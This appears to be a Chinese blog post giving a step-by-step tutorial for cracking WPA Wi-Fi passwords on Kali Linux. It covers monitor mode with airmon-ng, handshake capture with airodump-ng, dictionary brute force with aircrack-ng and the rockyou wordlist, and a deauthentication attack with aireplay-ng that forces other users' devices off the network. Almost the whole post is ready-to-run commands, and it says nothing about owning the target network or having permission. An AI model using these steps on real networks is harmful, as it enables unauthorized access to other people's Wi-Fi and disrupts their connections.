Kali破解wifi

xiaomiao 0

破解过程

1.在shell里输入airmon-ng查看下网卡信息

2.输入airmon-ng start wlan0开启网卡监听模式

3.再次查看网卡信息,注意这里一定是mon结尾,否则是你的网卡无monitor模式

4.命令行输入:airodump-ng wlan0mon (airodump-ng后接网卡名,去扫面周围wifi的信息,ctrl+c停止)
这里解释几个参数:

BSSID:MAC地址。

PWR:信号强度,越小信号越强。

#Data:传输的数据。

CH:信号频道,只有在一个频道才可进行下一步操作。

ESSID:wifi的名称,中文的可能会乱码。

5.抓包:在shell中输入airodump-ng -w wifi名字 -c 信道 --bssid MAC地址 wlan0mon

6.进入/usr/share/wordlists/路径下kali自带的密码字典rockyou.txt.gz进行解压:gzip -d rockyou.txt.gz

7.在shell中输入aircrack-ng -w /usr/share/wordlists/rockyou.txt(字典文件) 握手包名,这个过程就是暴力破解了

小技巧

1.教你怎样获取WPA Handshake,用Ipad连接需要破解的wifi,密码随便输,连接后发现就出来了
当然,一次不成功你也可以多试几次,不管有没有网卡连接都可以获取到WPA Handshake
当然了,智能手机的无线连接也是可以的

2.如果没有出现WPA Handshake,可以试着攻击wifi的使用者,使用以下命令:
aireplay-ng -0 2 -a wifiMAC地址-c 被攻击者MAC地址 wlan0mon
原理是,给连接到wifi的一个设备发送一个deauth(反认证)包,让那个设备断开wifi,随后它自然会再次连接wifi。
当我们多次尝试攻击并成功后就会获取报文,也就是说当窗口右上角出现WPA handshake时说明抓包成功。
于是我们就可以接着进行暴力破解了。
参数解释:

-0表示发起deauthentication攻击

-a指定无线路由器BSSID

-c指定强制断开的设备

发表评论 取消回复
表情 图片 链接 代码

分享
微信
微博
QQ